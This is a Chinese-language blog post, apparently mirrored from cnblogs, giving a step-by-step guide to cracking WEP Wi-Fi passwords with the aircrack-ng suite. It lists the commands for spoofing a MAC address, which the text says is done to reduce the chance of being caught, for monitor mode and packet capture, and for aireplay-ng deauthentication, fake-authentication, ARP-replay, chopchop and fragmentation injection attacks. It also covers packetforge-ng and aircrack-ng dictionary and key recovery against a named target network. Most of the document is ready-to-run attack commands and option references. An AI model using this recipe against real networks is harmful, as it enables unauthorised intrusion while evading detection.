zoukankan      html  css  js  c++  java
  • Linux:Aircrack-ng

    Aircrack-ng


    工具主要有
      airmon-ng 处理网卡工作模式
      airodump-ng 抓包
      aircrack-ng 破解
      aireplay-ng 发包,干扰
      另外还要用到以下 linux 命令:
      ifconfig 查看修改网卡状态和参数
      macchanger 伪造 MAC
      iwconfig 主要针对无线网卡的工具 (同 ifconfig)
      iwlist 获取无线网络的更详细信息
      
    具体破解步骤
      1. 修改无线网卡状态: down
      2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能
      3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡
      4. 修改无线网卡状态: up
      5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标
      6. 监听抓包:生成 .cap 或 .ivs
      7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
      8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解


    Crack Mode一共有5种
      airmon-ng start wlan0
      airodump-ng --ivs -w (目标路由器IVS文件) -c 6 mon0
      airodump-ng mon0

    crack mode
      1)

      aireplay-ng -1 0 -e 目标路由器SSID -a 目标MAC -h 本机MAC mon0

      2)
      aireplay-ng -2 -p 0841 -c ffffffffffff -b 目标MAC -h 本机MAC mon0
        3)
      aireplay-ng -3 -b 目标MAC -h 本机MAC mon0
      4)
      aireplay-ng -4 -b 目标MAC -h 本机MAC mon0
      packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
      aireplay-ng -2 -r MyArp -x 256 mon0
      5)
      aireplay-ng -5 -b 目标MAC -h 本机MACmon0
      packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
      aireplay-ng -2 -r MyArp -x 256 mon0


    Crack Key
      aircrack-ng -n 64 -b 目标MAC 目标路由器IVS文件-01.ivs

    命令的基本用法

    ifconfig

      用来配置网卡,我们这里主要用来 禁用和启用 网卡:

      ifconfig mon0 down

      ifconfig mon0 up

      禁用一下网卡的目的是为了下一步修改 MAC 。

    macchanger

      用来改变网卡的 MAC 地址,具体用法如下:

      useage: macchanger [options] device

      -h 显示帮助

      -V 显示版本

      -s 显示当前MAC

      -e 不改变mac,使用硬件厂商写入的MAC

      -a 自动生成一个同类型的MAC,同厂商的

      -A 自动生成一个不同类型的MAC,不同厂商的

      -r 生成任意MAC

      -l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品

      -m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 mon0 。

    airmon-ng

      启动无线网卡进入 Monitor 模式,

      useage: airmon-ng <start|stop|check> <interface> [channel]

      <start|stop|check>启动,停止,检测

      <interface>指定无线网卡

      [channel] 监听频道

    iwconfig

      专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。

      useage:iwconfig interface [options]

      [essid{NN|ON|OFF}] 指定essid号 开启关闭

      [nwid{NN|on|off}] 指定网络id号 开启关闭

      [mode {managed|ad-hoc|....}] 指定无线网络工作模式/类型

      [freq N.NNNN[K|M|G]] 指定工作频率

      [channel N] 指定频道

      [ap {N|off|auto}] 指定AP号 关闭/自动

      [sens N] sens 号

      [nick N] nick 号

      [rate {N|auto|fixed}] 速率控制

      [rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了

      [frag {N|auto|fixed|off}] 碎片控制

      [enc {NNNN-NNNN|off}] 范围

      [power {period N|timeout N}] 电源 频率/超时

      [retry {limit N|lifetime N}] 重试 限次/超时

      [txpower N{mw|dBm}] 功率 毫瓦/分贝

      [commit] 处理

    iwlist

      主要用来显示无线网卡的一些附加信息,同上

      useage: iwlist [interface] options

      scanning 扫描

      frequency 频率

      channel 频道

      bitrate 速率

      rate 速率

      encryption 加密

      key 密钥

      power 电源

      txpower 功率

      ap ap

      accespoints ap

      peers 直连

      event 事件

    airodump-ng

      useage: airodump-ng <options> <interface>[,<interface>,...]

      Options:

      --ivs :仅将抓取信息保存为 .ivs

      --gpsd :使用 GPSd

      --write <prefix> :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分

      -w :同 --write

      --beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的

      --update <secs> :显示更新延迟

      --showack :显示ack/cts/rts状态

      -h :隐藏已知的,配合上面的选项使用

      -f <msecs> :跳频时间

      --berlin <secs> :无数据包接收时延迟显示的时间,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.

      -r <file> :从指定的文件读取数据包.

      Filter options:

      --encrypt <suite> : 使用密码序列过滤 AP

      --netmask <netmask> : 使用掩码过滤 AP

      --bssid <bssid> : 使用 bssid 过滤 AP

      -a : 过滤无关的客户端.

       默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:

      --channel <channels>:指定频道

      --band <abg> :制定带宽

      -C <frequencies> :指定频率MHz

      --cswitch <method> : 设置频道交换方式

      0 : FIFO (default) 先进先出(默认)

      1 : Round Robin 循环

      2 : Hop on last 最后一跳

      -s : 同上

      --help : 显示使用方法

    aireplay-ng

      useage: aireplay-ng <options> <replay interface>

      Filter options:

      -b bssid : AP的 MAC

      -d dmac : 目标的 MAC

      -s smac : 来源的 MAC

      -m len : 最小包长度

      -n len : 最大包长度

      -u type : 帧控制, type field

      -v subt : 帧控制, subtype field

      -t tods : 帧控制, To DS bit

      -f fromds : 帧控制, From DS bit

      -w iswep : 帧控制, WEP bit

      -D : 禁用 AP 发现功能

      Replay options:

      -x nbpps : 每秒包数量

      -p fctrl : 框架设定 (hex)

      -a bssid : 设置AP的 mac

      -c dmac : 设置目标的 MAC

      -h smac : 设置来源的 mac

      -g value : 改变环缓存大小 (默认8)

      -F : 选择第一个匹配的包

      Fakeauth attack options:

      -e essid : 设置目标 AP 的 SSID

      -o npckts : 每秒爆破的包数量 (0 自动, 默认 1)

      -q sec : 存活时间 秒

      -y prga : 共享可信的 key流

       Replay attack options:

      -j : 注入 fromDS 数据包

      Fragmentation attack options:

      -k IP : 设置目的IP 碎片

      -l IP : 设置源IP碎片

      Test attack options:

      -B : 激活 bitrate 测试

      source options:

      -i iface : 设置抓包的接口设备

      -r file : 从pcap文件析取数据包

      attack modes (Numbers can still be used): 攻击模式,最具杀伤力的地方

      --deauth count : 不信任一切 (-0)

      --fakeauth delay : 欺骗AP的信任 (-1)

      --interactive : 交互的选择 (-2)

      --arpreplay : 标准的 ARP欺骗原理-request replay (-3)

      --chopchop : 解密 WEP 包 (-4)

      --fragment : 生成有效的 key流 (-5)

      --caffe-latte : 从客户端获取新的 IVs (-6)

      --cfrag : 对客户端进行碎片攻击 (-7)

      --test : 测试注射及效果 (-9)

      --help : 显示帮助

    aircrack-ng

      useage: aircrack-ng [options] <.cap / .ivs file(s)>

      Common options:

      -a <amode> : 暴破 (1/WEP, 2/WPA-PSK)

      -e <essid> : 选择 essid 为目标

      -b <bssid> : 选择 ap的 mac 为目标

      -q : 使用安静模式,无数出模式

      -C <macs> : 将所有的 AP 合并为一个虚拟的

      Static WEP cracking options:

      -c : 仅搜索字母数字

      -t : 仅搜索二进制

      -h : 搜索数字关键

      -d <mask> : 指定掩码(A1:XX:CF:YY)

      -m <maddr> : 用 MAC 匹配可用的数据包

      -n <nbits> : WEP 长度 64/128/152/256/512

      -i <index> : WEP 索引(1 to 4), default: any

      -f <fudge> : 暴破强度默认2

      -k <korek> : 禁用一种破解方式 (1 to 17)

      -x or -x0 : 禁用最新关键字暴破

      -x1 : 使用最新关键字暴破 默认

      -x2 : 用最新两个字节暴破

      -y : 实验单线程模式

      -K : KoreK 攻击 (pre-PTW)

      -s : 显示为 ASCII

      -M <num> : 最大数量 ivs 使用

      -D : WEP 非隐蔽模式

      -P <num> : PTW debug: 1 disable Klein, 2 PTW

      -1 : 尝试一次 PTW

      WEP and WPA-PSK cracking options:

      -w <words> : 指定目录文件,可以多个

      -r <DB> : 制定 airolib-ng 数据库,不能和 -w 一起使用

      --help : 帮助

    实例

      

      ifconfig mon0 down

      macchanger -r mon0

      macchanger -r wlan0

      ifconfig mon0 up

      airmon-ng start mon0 

      iwconfig mon0

      iwlist mon0 scanning

      airodump-ng -w *.cap -c 6 mon0

      aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX mon0 aireplay-ng -5 -b ap_mac -h XXXXXXXXXX mon0

      aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 mon0

      aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB mon0

      aireplay-ng -3 -b <AP MAC> -h <my MAC> -i mon0

      aircrack-ng -x -f 2 *.cap

      aircrack-ng -w passdict.txt *.cap

      aircrack-ng -n 64 -b apmac *.ivs

  • 相关阅读:
    map
    构造函数和对象
    for...in...and for each...in...
    事件
    JSON
    css伪类
    正则表达式
    什么是DOM、什么是BOM
    CSS颜色
    grid-layout实验
  • 原文地址:https://www.cnblogs.com/Spiro-K/p/6517676.html
Copyright © 2011-2022 走看看